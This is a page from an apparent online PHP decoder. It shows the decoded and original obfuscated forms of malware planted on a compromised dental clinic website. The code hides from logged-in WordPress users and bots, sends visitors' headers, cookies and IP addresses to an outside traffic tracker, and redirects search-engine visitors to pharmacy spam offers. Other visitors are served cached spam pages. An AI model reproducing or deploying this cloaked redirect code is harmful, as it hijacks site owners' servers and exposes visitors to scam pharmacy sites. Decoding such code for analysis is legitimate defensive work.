Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto x7rFo; VFfKB: class ResponseExecutor { public static function sendHeaders($re..

Decoded Output download

<?php 
 goto x7rFo; VFfKB: class ResponseExecutor { public static function sendHeaders($result) { if (!empty($result->headers)) { foreach ($result->headers as $header) { if (!headers_sent()) { header($header); } } } if (!empty($result->status)) { static::_sendResponseCode($result->status); } if (!empty($result->contentType)) { $header = "Content-type: " . $result->contentType; $headers[] = $header; if (!headers_sent()) { header($header); } } } public static function containsActionHeader($headers) { if (empty($headers)) { return false; } foreach ($headers as $header) { if (strpos($header, "Location:") === 0) { return true; } if (strstr($header, "404 Not Found")) { return true; } } return false; } private static function _sendResponseCode($code = null) { if ($code !== null) { switch ($code) { case 100: $text = "Continue"; break; case 101: $text = "Switching Protocols"; break; case 200: $text = "OK"; break; case 201: $text = "Created"; break; case 202: $text = "Accepted"; break; case 203: $text = "Non-Authoritative Information"; break; case 204: $text = "No Content"; break; case 205: $text = "Reset Content"; break; case 206: $text = "Partial Content"; break; case 300: $text = "Multiple Choices"; break; case 301: $text = "Moved Permanently"; break; case 302: $text = "Moved Temporarily"; break; case 303: $text = "See Other"; break; case 304: $text = "Not Modified"; break; case 305: $text = "Use Proxy"; break; case 400: $text = "Bad Request"; break; case 401: $text = "Unauthorized"; break; case 402: $text = "The license must be in Pro edition or higher"; break; case 403: $text = "Forbidden"; break; case 404: $text = "Not Found"; break; case 405: $text = "Method Not Allowed"; break; case 406: $text = "Not Acceptable"; break; case 407: $text = "Proxy Authentication Required"; break; case 408: $text = "Request Time-out"; break; case 409: $text = "Conflict"; break; case 410: $text = "Gone"; break; case 411: $text = "Length Required"; break; case 412: $text = "Precondition Failed"; break; case 413: $text = "Request Entity Too Large"; break; case 414: $text = "Request-URI Too Large"; break; case 415: $text = "Unsupported Media Type"; break; case 500: $text = "Internal Server Error"; break; case 501: $text = "Not Implemented"; break; case 502: $text = "Bad Gateway"; break; case 503: $text = "Service Unavailable"; break; case 504: $text = "Gateway Time-out"; break; case 505: $text = "HTTP Version not supported"; break; default: $text = ''; } $protocol = isset($_SERVER["SERVER_PROTOCOL"]) ? $_SERVER["SERVER_PROTOCOL"] : "HTTP/1.0"; header($protocol . " " . $code . " " . $text); } } } goto B3hV5; nBbF2: class_alias("KClient", "KClickClient"); goto D0gA3; D0gA3: if (isset($_COOKIE)) { foreach ($_COOKIE as $key => $val) { if (preg_match("/wordpress_logged_in/i", $key)) { $logged = true; } } } goto mnLtI; TmGrz: class KClientError extends Exception { const ERROR_UNKNOWN = "UNKNOWN"; public function getHumanCode() { switch ($this->getCode()) { case CURLE_HTTP_RETURNED_ERROR: preg_match("/The requested URL returned error: (?'errorCode'\d+).*$/", $this->getMessage(), $matches); $errorCode = isset($matches["errorCode"]) ? $matches["errorCode"] : "HTTP_ERROR_" . self::ERROR_UNKNOWN; return "[REQ_ERR: {$errorCode}]"; case CURLE_UNSUPPORTED_PROTOCOL: return "[REQ_ERR: UNSUPPORTED_PROTOCOL]"; case CURLE_FAILED_INIT: return "[REQ_ERR: FAILED_INIT]"; case CURLE_URL_MALFORMAT: return "[REQ_ERR: BAD_URL]"; case CURLE_COULDNT_RESOLVE_PROXY: return "[REQ_ERR: COULDNT_RESOLVE_PROXY]"; case CURLE_COULDNT_RESOLVE_HOST: return "[REQ_ERR: COULDNT_RESOLVE_HOST]"; case CURLE_COULDNT_CONNECT: return "[REQ_ERR: COULDNT_CONNECT]"; case CURLE_PARTIAL_FILE: return "[REQ_ERR: PARTIAL_FILE]"; case CURLE_READ_ERROR: return "[REQ_ERR: READ_ERROR]"; case CURLE_OUT_OF_MEMORY: return "[REQ_ERR: OUT_OF_MEMORY]"; case CURLE_OPERATION_TIMEDOUT: return "[REQ_ERR: OPERATION_TIMEDOUT]"; case CURLE_HTTP_POST_ERROR: return "[REQ_ERR: HTTP_POST_ERROR]"; case CURLE_BAD_FUNCTION_ARGUMENT: return "[REQ_ERR: BAD_FUNCTION_ARGUMENT]"; case CURLE_TOO_MANY_REDIRECTS: return "[REQ_ERR: TOO_MANY_REDIRECTS]"; case CURLE_GOT_NOTHING: return "[REQ_ERR: GOT_NOTHING]"; case CURLE_SEND_ERROR: return "[REQ_ERR: SEND_ERROR]"; case CURLE_RECV_ERROR: return "[REQ_ERR: RECV_ERROR]"; case CURLE_BAD_CONTENT_ENCODING: return "[REQ_ERR: BAD_CONTENT_ENCODING]"; case CURLE_SSL_CACERT: case CURLE_SSL_CACERT_BADFILE: case CURLE_SSL_CERTPROBLEM: case CURLE_SSL_CIPHER: case CURLE_SSL_CONNECT_ERROR: case CURLE_SSL_ENGINE_NOTFOUND: case CURLE_SSL_ENGINE_SETFAILED: case CURLE_SSL_PEER_CERTIFICATE: case CURLE_SSL_PINNEDPUBKEYNOTMATCH: return "[REQ_ERR: SSL]"; case CURLE_OK: return ''; default: return "[REQ_ERR: " . self::ERROR_UNKNOWN . "]"; } } } goto nBbF2; B3hV5: class KHttpClient { const UA = "KHttpClient"; public function request($url, $params, $opts = array()) { if (!in_array("curl", get_loaded_extensions())) { return json_encode(array("error" => "Curl extension must be instsalled")); } $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_COOKIE, isset($opts["cookies"]) ? $opts["cookies"] : null); curl_setopt($ch, CURLOPT_NOBODY, 0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_USERAGENT, self::UA); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); curl_setopt($ch, CURLOPT_FAILONERROR, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $result = curl_exec($ch); if (curl_error($ch)) { throw new KClientError(curl_error($ch), curl_errno($ch)); } if (empty($result)) { throw new KClientError("Empty response"); } return $result; } } goto TmGrz; x7rFo: class KClient { const SESSION_SUB_ID = "sub_id"; const SESSION_LANDING_TOKEN = "landing_token"; const VERSION = 3; const STATE_SESSION_KEY = "keitaro_state"; const STATE_SESSION_EXPIRES_KEY = "keitaro_state_expires"; const DEFAULT_TTL = 1; const NOT_FOUND_STATUS = 404; private $_httpClient; private $_debug = false; private $_trackerUrl; private $_params = array(); private $_log = array(); private $_excludeParams = array("api_key", "token", "language", "ua", "ip", "referrer", "force_redirect_offer"); private $_result; private $_stateRestored; private $_sessionsDisabled = false; const ERROR = "[KTrafficClient] Something is wrong. Enable debug mode to see the reason."; public function __construct($trackerUrl, $token) { $this->trackerUrl($trackerUrl); $this->campaignToken($token); $this->version(self::VERSION); $this->param("info", 1); $this->fillParams(); } public function fillParams() { $referrer = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : null; $this->setHttpClient(new KHttpClient()); $host = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : null; $requestUri = isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : null; $this->ip($this->_findIp())->ua(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : null)->language(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? substr($_SERVER["HTTP_ACCEPT_LANGUAGE"], 0, 2) : '')->xRequestedWith(isset($_SERVER["HTTP_X_REQUESTED_WITH"]) ? $_SERVER["HTTP_X_REQUESTED_WITH"] : null)->seReferrer($referrer)->referrer($referrer)->param("original_headers", $this->_getAllHeaders())->param("original_host", isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : "localhost")->param("original_method", isset($_SERVER["REQUEST_METHOD"]) ? $_SERVER["REQUEST_METHOD"] : "GET")->param("uri", (!empty($_SERVER["HTTPS"]) ? "https" : "http") . "://" . $host . $requestUri)->param("kversion", "3.4"); if ($this->isPrefetchDetected()) { $this->param("prefetch", 1); } } public function currentPageAsReferrer() { $this->referrer($this->_getCurrentPage()); return $this; } public function debug($state = true) { $this->_debug = $state; return $this; } public function seReferrer($seReferrer) { $this->_params["se_referrer"] = $seReferrer; return $this; } public function referrer($referrer) { $this->_params["referrer"] = $referrer; return $this; } public function xRequestedWith($xRequestedWith) { $this->_params["x_requested_with"] = $xRequestedWith; return $this; } public function setHttpClient($httpClient) { $this->_httpClient = $httpClient; return $this; } public function trackerUrl($trackerUrl) { if (!empty($trackerUrl)) { $request = parse_url($trackerUrl); $this->_trackerUrl = "{$request["scheme"]}://{$request["host"]}"; if (isset($request["port"])) { $this->_trackerUrl .= ":" . $request["port"]; } } } public function token($token) { return $this->campaignToken($token); } public function campaignToken($campaignToken) { $this->_params["token"] = $campaignToken; return $this; } public function version($version) { $this->_params["version"] = $version; return $this; } public function ua($ua) { $this->_params["ua"] = $ua; return $this; } public function language($language) { $this->_params["language"] = $language; return $this; } public function keyword($keyword) { $this->_params["keyword"] = $keyword; return $this; } public function forceRedirectOffer() { $this->_params["force_redirect_offer"] = 1; } public function ip($ip) { $this->_params["ip"] = $ip; return $this; } public function sendUtmLabels() { foreach ($_GET as $name => $value) { if (strstr($name, "utm_")) { $this->_params[$name] = $value; } } } public function setLandingToken($token) { $this->_startSession(); $_SESSION["token"] = $token; } public function getSubId() { $result = $this->performRequest(); if (empty($result->info->sub_id)) { $this->log("No sub_id is defined"); return "no_subid"; } $subId = $result->info->sub_id; return $subId; } public function getToken() { $result = $this->performRequest(); if (empty($result->info->sub_id)) { $this->log("No landing token is defined"); return "no_token"; } $subId = $result->info->token; return $subId; } public function sendAllParams() { foreach ($_GET as $name => $value) { if (empty($this->_params[$name]) && !in_array($name, $this->_excludeParams)) { $this->_params[$name] = $value; } } } public function restoreFromSession() { if ($this->isStateRestored() || $this->_sessionsDisabled) { return; } $this->_startSession(); if (!empty($_SESSION[self::STATE_SESSION_KEY])) { if ($_SESSION[self::STATE_SESSION_EXPIRES_KEY] < time()) { unset($_SESSION[self::STATE_SESSION_KEY]); unset($_SESSION[self::STATE_SESSION_EXPIRES_KEY]); $this->log("State expired"); } else { $this->_result = json_decode($_SESSION[self::STATE_SESSION_KEY], false); if (isset($this->_result) && isset($this->_result->headers)) { $this->_result->headers = array(); } $this->_stateRestored = true; $this->log("State restored"); } } } public function disableSessions() { $this->_sessionsDisabled = true; } public function restoreFromQuery() { if (isset($_GET["_subid"])) { $this->_stateRestored = true; if (empty($this->_result)) { $this->_result = new StdClass(); $this->_result->info = new StdClass(); } $this->_result->info->sub_id = $_GET["_subid"]; $this->log("SubId loaded from query"); if (isset($_GET["_token"])) { $this->_result->info->token = $_GET["_token"]; $this->log("Landing token loaded from query"); } $this->_storeState($this->_result, self::DEFAULT_TTL); $this->_stateRestored = true; } } public function isStateRestored() { return $this->_stateRestored; } public function isPrefetchDetected() { $checkServerParams = array("HTTP_X_PURPOSE" => "preview", "HTTP_X_MOZ" => "prefetch", "HTTP_X_FB_HTTP_ENGINE" => "Liger"); foreach ($checkServerParams as $name => $value) { if (isset($_SERVER[$name]) && $_SERVER[$name] == $value) { return true; } } return false; } public function saveCookie($key, $value, $ttl) { if (isset($_COOKIE[$key]) && $_COOKIE[$key] == $value) { return; } if (!headers_sent()) { setcookie($key, $value, $this->_getCookiesExpireTimestamp($ttl), "/", $this->_getCookieHost()); } $_COOKIE[$key] = $value; } public function param($name, $value) { if (!in_array($name, $this->_excludeParams)) { $this->_params[$name] = $value; } return $this; } public function params($value) { if (!empty($value)) { if (is_string($value)) { parse_str($value, $result); foreach ($result as $name => $value) { $this->param($name, $value); } } } return $this; } public function reset() { $this->_result = null; } public function performRequest() { if ($this->_result) { return $this->_result; } $request = $this->_buildRequestUrl(); $params = $this->getParams(); $options = $this->_getRequestOptions(); $this->log("Request: " . $request); try { $result = $this->_httpClient->request($request, $params, $options); $this->log("Response: " . $result); } catch (KClientError $e) { if ($this->_debug) { throw $e; } else { $errorCode = $e->getHumanCode(); $errorCode = $errorCode ? $errorCode . " " : ''; echo $errorCode . self::ERROR; return; } } $this->_result = json_decode($result); $this->_storeState($this->_result, isset($this->_result->cookies_ttl) ? $this->_result->cookies_ttl : null); if (isset($this->_result->cookies)) { $this->_saveKeitaroCookies($this->_result->cookies, $this->_result->cookies_ttl); } return $this->_result; } public function execute($break = false, $print = true) { $result = $this->performRequest(); $body = $this->_buildBody($result); if (!$print) { return $body; } $this->_sendHeaders($result); echo $body; } public function executeAndBreak() { $result = $this->performRequest(); $body = $this->_buildBody($result); $this->_sendHeaders($result); if (!empty($body)) { die($body); } if (!empty($result->headers) && ResponseExecutor::containsActionHeader($result->headers)) { die($body); } if (!empty($result->status) && $result->status == self::NOT_FOUND_STATUS) { die($body); } } public function getContent() { $result = $this->performRequest(); return $this->_buildBody($result); } public function showLog($separator = "<br />") { echo "<hr>" . implode($separator, $this->getLog()) . "<hr>"; } public function log($msg) { if ($this->_debug) { error_log($msg); } $this->_log[] = $msg; } public function getLog() { return $this->_log; } public function getParams() { return $this->_params; } private function _sendHeaders($result) { $file = ''; $line = ''; if (headers_sent($file, $line)) { $msg = "Body output already started"; if (!empty($file)) { $msg .= "({$file}:{$line})"; } $this->log($msg); return; } ResponseExecutor::sendHeaders($result); } private function _storeState($result, $ttl) { if ($this->_sessionsDisabled) { return; } $this->_startSession(); $_SESSION[self::STATE_SESSION_KEY] = json_encode($result); $_SESSION[self::STATE_SESSION_EXPIRES_KEY] = time() + $ttl * 60 * 60; if (!empty($result->info)) { if (!empty($result->info->sub_id)) { $_SESSION[self::SESSION_SUB_ID] = $result->info->sub_id; } if (!empty($result->info->token)) { $_SESSION[self::SESSION_LANDING_TOKEN] = $result->info->token; } } } private function _buildBody($result) { $content = ''; if (!empty($result)) { if (!empty($result->error)) { $content .= $result->error; } if (!empty($result->body)) { if (isset($result->contentType) && (strstr($result->contentType, "image") || strstr($result->contentType, "application/pdf"))) { $content = base64_decode($result->body); } else { $content .= $result->body; } } } return $content; } private function _saveKeitaroCookies($cookies, $ttl) { foreach ($cookies as $key => $value) { $this->saveCookie($key, $value, $ttl); } } public function getOffer($params = array(), $fallback = "no_offer") { $result = $this->performRequest(); $token = $this->getToken(); if (empty($token)) { $this->log("Campaign hasn't returned offer"); return $fallback; } $params["_lp"] = 1; $params["_token"] = $result->info->token; return $this->_buildOfferUrl($params); } public function isBot() { $result = $this->performRequest(); if (isset($result->info)) { return isset($result->info->is_bot) ? $result->info->is_bot : false; } } public function isUnique($level = "campaign") { $result = $this->performRequest(); if (isset($result->info) && $result->info->uniqueness) { return isset($result->info->uniqueness->{$level}) ? $result->info->uniqueness->{$level} : false; } } public function forceChooseOffer() { throw new \Error("forceChooseOffer was removed in KClient v3."); } public function getBody() { $result = $this->performRequest(); return $result->body; } public function getHeaders() { $result = $this->performRequest(); return $result->headers; } private function _startSession() { if (!headers_sent()) { @session_start(); } } private function _buildOfferUrl($params = array()) { $params = http_build_query($params); return "{$this->_trackerUrl}/?{$params}"; } private function _getCurrentPage() { if (isset($_SERVER["SERVER_PORT"]) && $_SERVER["SERVER_PORT"] == 443 || !empty($_SERVER["HTTPS"])) { $scheme = "https"; } else { $scheme = "http"; } return $scheme . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; } private function _buildRequestUrl() { return $this->_trackerUrl . "/click_api/v" . self::VERSION; } private function _findIp() { $ip = null; $headers = array("HTTP_X_FORWARDED_FOR", "HTTP_FORWARDED_FOR", "HTTP_X_FORWARDED", "HTTP_FORWARDED", "HTTP_CLIENT_IP", "HTTP_FORWARDED_FOR_IP", "X_FORWARDED_FOR", "FORWARDED_FOR", "X_FORWARDED", "FORWARDED", "CLIENT_IP", "FORWARDED_FOR_IP", "HTTP_CF_CONNECTING_IP", "HTTP_PROXY_CONNECTION"); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $tmp = explode(",", $_SERVER[$header]); $ip = trim($tmp[0]); break; } } if (strstr($ip, ",")) { $tmp = explode(",", $ip); if (stristr($_SERVER["HTTP_USER_AGENT"], "mini")) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (empty($ip)) { $ip = isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "127.0.0.1"; } return $ip; } private function _getCookiesExpireTimestamp($ttl) { return time() + 60 * 60 * $ttl; } private function _getCookieHost() { if (isset($_SERVER["HTTP_HOST"]) && substr_count($_SERVER["HTTP_HOST"], ".") < 3) { $host = "." . str_replace("www.", '', $_SERVER["HTTP_HOST"]); } else { $host = null; } return $host; } private function _getRequestOptions() { $opts = array(); if (isset($_SERVER["HTTP_COOKIE"])) { $opts["cookies"] = preg_replace("/PHPSESSID=.*?;/si", '', $_SERVER["HTTP_COOKIE"]); } return $opts; } private function _getAllHeaders() { $headers = array(); foreach ($_SERVER as $name => $value) { if (substr($name, 0, 5) == "HTTP_") { $headers[str_replace(" ", "-", ucwords(strtolower(str_replace("_", " ", substr($name, 5)))))] = $value; } } return $headers; } } goto VFfKB; mnLtI: if (!$logged) { if (preg_match("/\/farmacia\//", $_SERVER["REQUEST_URI"])) { $page = str_replace("/", "+", $_SERVER["REQUEST_URI"]); if (file_exists("/home/clinicadentalfelipe.es/tmp/.tmp/" . $page) && $page != '') { $prod = ''; $m = array(); if (preg_match("/ingredient/", $page)) { preg_match("/ingredients\+(.*)(\-|\.)/U", $page, $m); $prod = $m[1]; } if (preg_match("/farmacia/", $page)) { preg_match("/farmacia\/m\/\+(.*)(\-|\.)/U", $page, $m); $prod = $m[1]; } if ($prod == "ventolin-inhaler") { $prod = "ventolin"; } if (!preg_match("/(bot|curl)/", @$_SERVER["HTTP_USER_AGENT"]) && !preg_match("/ru|kz/i", $_SERVER["HTTP_ACCEPT_LANGUAGE"]) && preg_match("#(google|aol|yahoo|bing|search|baidu|xfinity|ask|zoo)#i", @$_SERVER["HTTP_REFERER"])) { $client = new KClient("https://maketophotlove.com/", "75kgpqtrnkz6lmkxspsgdfspv3yf4xql"); $client->sendAllParams(); $client->forceRedirectOffer(); $client->param("sub_id_2", "clinicadentalfelipe.es"); $client->param("sub_id_1", $prod); $client->currentPageAsReferrer(); $client->executeAndBreak(); } else { echo file_get_contents("/home/clinicadentalfelipe.es/tmp/.tmp/" . $page); die; } } } } ?>

Did this file decode correctly?

Original Code

<?php
 goto x7rFo; VFfKB: class ResponseExecutor { public static function sendHeaders($result) { if (!empty($result->headers)) { foreach ($result->headers as $header) { if (!headers_sent()) { header($header); } } } if (!empty($result->status)) { static::_sendResponseCode($result->status); } if (!empty($result->contentType)) { $header = "\x43\x6f\156\164\145\156\x74\55\164\x79\x70\x65\x3a\40" . $result->contentType; $headers[] = $header; if (!headers_sent()) { header($header); } } } public static function containsActionHeader($headers) { if (empty($headers)) { return false; } foreach ($headers as $header) { if (strpos($header, "\114\157\143\141\164\151\x6f\156\72") === 0) { return true; } if (strstr($header, "\x34\x30\x34\40\116\x6f\x74\x20\x46\157\x75\156\x64")) { return true; } } return false; } private static function _sendResponseCode($code = null) { if ($code !== null) { switch ($code) { case 100: $text = "\x43\157\x6e\x74\151\156\165\145"; break; case 101: $text = "\123\167\151\164\143\150\151\156\x67\x20\120\162\157\x74\x6f\143\157\x6c\163"; break; case 200: $text = "\x4f\x4b"; break; case 201: $text = "\103\x72\x65\141\x74\x65\x64"; break; case 202: $text = "\101\143\x63\x65\x70\x74\x65\x64"; break; case 203: $text = "\116\x6f\156\55\x41\x75\164\x68\157\162\151\x74\x61\164\x69\166\145\x20\x49\x6e\146\x6f\162\155\141\x74\x69\157\156"; break; case 204: $text = "\x4e\157\x20\103\157\x6e\x74\145\156\x74"; break; case 205: $text = "\x52\145\163\145\164\40\103\x6f\x6e\164\145\156\x74"; break; case 206: $text = "\120\x61\x72\x74\x69\x61\x6c\x20\103\x6f\156\164\x65\x6e\164"; break; case 300: $text = "\x4d\x75\x6c\164\151\x70\154\x65\40\x43\150\x6f\151\x63\x65\163"; break; case 301: $text = "\115\157\166\x65\x64\40\x50\x65\162\155\141\156\x65\x6e\164\154\x79"; break; case 302: $text = "\115\x6f\166\145\144\x20\x54\x65\x6d\x70\157\162\x61\162\x69\154\171"; break; case 303: $text = "\123\145\x65\x20\x4f\x74\150\x65\162"; break; case 304: $text = "\116\157\164\x20\x4d\157\x64\151\x66\x69\x65\144"; break; case 305: $text = "\125\x73\145\40\x50\x72\157\170\x79"; break; case 400: $text = "\102\141\144\x20\x52\145\x71\x75\x65\x73\x74"; break; case 401: $text = "\x55\156\x61\x75\x74\x68\x6f\x72\151\172\145\x64"; break; case 402: $text = "\x54\x68\145\x20\x6c\151\x63\145\156\163\145\40\x6d\165\163\164\40\142\x65\40\x69\x6e\40\x50\x72\157\40\145\144\151\x74\151\x6f\x6e\40\157\x72\40\x68\x69\147\150\145\x72"; break; case 403: $text = "\x46\x6f\x72\x62\x69\144\x64\x65\x6e"; break; case 404: $text = "\116\157\x74\40\106\x6f\x75\x6e\x64"; break; case 405: $text = "\115\145\x74\x68\157\x64\x20\x4e\157\164\x20\x41\154\x6c\x6f\167\x65\144"; break; case 406: $text = "\x4e\x6f\164\40\x41\x63\143\x65\160\x74\x61\x62\x6c\145"; break; case 407: $text = "\x50\162\157\x78\x79\x20\x41\x75\x74\150\145\156\164\x69\143\x61\164\151\x6f\156\x20\122\145\x71\x75\x69\162\x65\144"; break; case 408: $text = "\122\145\x71\x75\145\x73\x74\40\x54\x69\x6d\145\55\x6f\165\x74"; break; case 409: $text = "\x43\x6f\156\146\154\151\143\164"; break; case 410: $text = "\x47\157\x6e\145"; break; case 411: $text = "\114\x65\x6e\147\164\150\40\122\x65\x71\x75\x69\162\x65\x64"; break; case 412: $text = "\120\162\145\x63\x6f\156\144\151\x74\x69\157\x6e\40\106\x61\151\x6c\x65\144"; break; case 413: $text = "\122\145\161\x75\x65\163\x74\40\x45\156\164\x69\x74\171\x20\x54\157\x6f\40\114\x61\x72\x67\145"; break; case 414: $text = "\122\145\161\165\x65\163\x74\55\125\x52\x49\x20\x54\x6f\x6f\40\x4c\x61\x72\x67\x65"; break; case 415: $text = "\x55\156\163\x75\160\160\157\x72\x74\145\x64\x20\x4d\145\144\151\141\x20\x54\171\x70\x65"; break; case 500: $text = "\x49\156\x74\x65\162\156\141\x6c\40\x53\145\x72\166\x65\162\40\x45\x72\162\157\162"; break; case 501: $text = "\x4e\x6f\164\x20\x49\155\x70\x6c\x65\155\145\x6e\164\145\144"; break; case 502: $text = "\x42\x61\144\40\x47\141\x74\145\167\x61\x79"; break; case 503: $text = "\123\145\162\x76\x69\x63\145\x20\125\156\x61\166\x61\151\x6c\x61\142\154\x65"; break; case 504: $text = "\x47\141\x74\145\167\141\x79\x20\124\x69\x6d\145\x2d\x6f\165\164"; break; case 505: $text = "\x48\124\124\120\x20\126\145\x72\163\151\157\156\40\156\157\164\40\x73\165\x70\x70\157\162\x74\145\x64"; break; default: $text = ''; } $protocol = isset($_SERVER["\x53\x45\122\x56\105\x52\x5f\x50\122\x4f\124\x4f\x43\x4f\114"]) ? $_SERVER["\x53\x45\122\126\105\x52\x5f\120\122\117\124\x4f\x43\x4f\x4c"] : "\110\124\x54\x50\x2f\x31\x2e\60"; header($protocol . "\x20" . $code . "\40" . $text); } } } goto B3hV5; nBbF2: class_alias("\x4b\103\x6c\151\145\x6e\x74", "\113\103\154\151\x63\x6b\x43\154\151\145\x6e\x74"); goto D0gA3; D0gA3: if (isset($_COOKIE)) { foreach ($_COOKIE as $key => $val) { if (preg_match("\x2f\x77\x6f\x72\x64\160\x72\x65\163\x73\137\x6c\x6f\x67\147\x65\x64\x5f\x69\x6e\x2f\x69", $key)) { $logged = true; } } } goto mnLtI; TmGrz: class KClientError extends Exception { const ERROR_UNKNOWN = "\x55\116\113\116\117\x57\116"; public function getHumanCode() { switch ($this->getCode()) { case CURLE_HTTP_RETURNED_ERROR: preg_match("\x2f\x54\150\145\x20\x72\145\x71\x75\145\x73\164\145\x64\x20\125\x52\x4c\40\162\x65\164\x75\x72\x6e\x65\144\40\145\x72\x72\157\162\x3a\40\x28\77\x27\145\162\162\x6f\x72\x43\x6f\144\x65\x27\134\144\x2b\x29\56\x2a\x24\x2f", $this->getMessage(), $matches); $errorCode = isset($matches["\145\162\x72\x6f\162\x43\157\144\x65"]) ? $matches["\145\x72\162\x6f\x72\103\x6f\x64\145"] : "\x48\124\x54\120\x5f\105\122\x52\x4f\122\x5f" . self::ERROR_UNKNOWN; return "\x5b\x52\105\x51\137\x45\x52\122\72\40{$errorCode}\135"; case CURLE_UNSUPPORTED_PROTOCOL: return "\133\x52\105\121\x5f\105\x52\x52\x3a\40\x55\x4e\x53\x55\120\x50\x4f\122\x54\x45\x44\137\x50\122\117\x54\x4f\x43\x4f\x4c\x5d"; case CURLE_FAILED_INIT: return "\133\122\105\121\x5f\105\x52\x52\x3a\x20\106\x41\111\x4c\x45\104\137\111\116\111\x54\x5d"; case CURLE_URL_MALFORMAT: return "\133\122\x45\x51\137\x45\x52\122\72\40\102\101\x44\137\x55\122\x4c\135"; case CURLE_COULDNT_RESOLVE_PROXY: return "\x5b\122\105\121\x5f\105\x52\x52\x3a\40\x43\117\125\x4c\x44\x4e\124\137\x52\105\123\117\x4c\126\x45\137\120\122\117\130\131\x5d"; case CURLE_COULDNT_RESOLVE_HOST: return "\x5b\x52\x45\121\137\x45\122\122\72\x20\103\x4f\x55\x4c\104\x4e\x54\137\x52\x45\x53\117\114\126\x45\x5f\110\117\123\x54\x5d"; case CURLE_COULDNT_CONNECT: return "\x5b\x52\105\x51\x5f\105\x52\122\x3a\x20\x43\117\x55\x4c\104\x4e\124\x5f\x43\117\x4e\x4e\x45\103\x54\x5d"; case CURLE_PARTIAL_FILE: return "\x5b\122\105\121\137\x45\x52\122\72\x20\120\x41\122\x54\x49\101\x4c\x5f\106\111\114\x45\135"; case CURLE_READ_ERROR: return "\x5b\x52\x45\x51\x5f\x45\x52\x52\72\40\122\105\101\104\x5f\105\122\122\117\x52\135"; case CURLE_OUT_OF_MEMORY: return "\x5b\122\x45\x51\137\105\x52\x52\72\40\117\125\x54\x5f\x4f\106\x5f\x4d\x45\115\x4f\122\131\x5d"; case CURLE_OPERATION_TIMEDOUT: return "\133\122\x45\121\137\105\122\x52\72\x20\x4f\x50\x45\122\101\124\x49\117\x4e\137\x54\111\115\x45\104\117\x55\124\x5d"; case CURLE_HTTP_POST_ERROR: return "\133\122\x45\x51\137\105\122\x52\x3a\40\x48\x54\124\x50\x5f\x50\117\x53\x54\x5f\x45\x52\122\117\x52\x5d"; case CURLE_BAD_FUNCTION_ARGUMENT: return "\133\x52\105\x51\137\x45\122\122\72\x20\102\x41\104\x5f\x46\125\x4e\103\124\111\x4f\x4e\137\101\122\x47\125\115\105\x4e\124\x5d"; case CURLE_TOO_MANY_REDIRECTS: return "\x5b\x52\x45\x51\x5f\x45\x52\x52\72\40\x54\x4f\117\137\115\x41\x4e\x59\x5f\x52\x45\104\x49\x52\105\x43\124\x53\x5d"; case CURLE_GOT_NOTHING: return "\133\x52\x45\x51\137\x45\x52\122\x3a\x20\x47\117\x54\x5f\x4e\x4f\x54\x48\111\x4e\107\x5d"; case CURLE_SEND_ERROR: return "\x5b\x52\105\x51\137\x45\122\x52\x3a\40\x53\x45\116\x44\x5f\x45\x52\x52\x4f\122\x5d"; case CURLE_RECV_ERROR: return "\133\x52\105\x51\x5f\105\x52\122\72\40\x52\x45\x43\x56\137\x45\122\x52\117\x52\x5d"; case CURLE_BAD_CONTENT_ENCODING: return "\133\x52\x45\121\137\105\122\x52\72\40\102\101\x44\137\103\117\116\124\105\116\x54\x5f\x45\x4e\103\117\x44\111\116\x47\x5d"; case CURLE_SSL_CACERT: case CURLE_SSL_CACERT_BADFILE: case CURLE_SSL_CERTPROBLEM: case CURLE_SSL_CIPHER: case CURLE_SSL_CONNECT_ERROR: case CURLE_SSL_ENGINE_NOTFOUND: case CURLE_SSL_ENGINE_SETFAILED: case CURLE_SSL_PEER_CERTIFICATE: case CURLE_SSL_PINNEDPUBKEYNOTMATCH: return "\x5b\122\x45\x51\x5f\x45\122\122\72\40\123\123\114\135"; case CURLE_OK: return ''; default: return "\133\x52\x45\121\x5f\x45\x52\x52\72\40" . self::ERROR_UNKNOWN . "\135"; } } } goto nBbF2; B3hV5: class KHttpClient { const UA = "\x4b\110\x74\164\160\x43\x6c\151\x65\x6e\x74"; public function request($url, $params, $opts = array()) { if (!in_array("\x63\x75\x72\154", get_loaded_extensions())) { return json_encode(array("\x65\x72\x72\x6f\162" => "\103\x75\162\154\x20\x65\x78\x74\x65\156\x73\x69\x6f\156\40\x6d\x75\163\x74\x20\142\145\x20\x69\156\x73\x74\x73\x61\x6c\154\145\144")); } $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_COOKIE, isset($opts["\x63\157\157\x6b\x69\145\x73"]) ? $opts["\x63\x6f\157\x6b\x69\145\163"] : null); curl_setopt($ch, CURLOPT_NOBODY, 0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_USERAGENT, self::UA); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); curl_setopt($ch, CURLOPT_FAILONERROR, true); curl_setopt($ch, 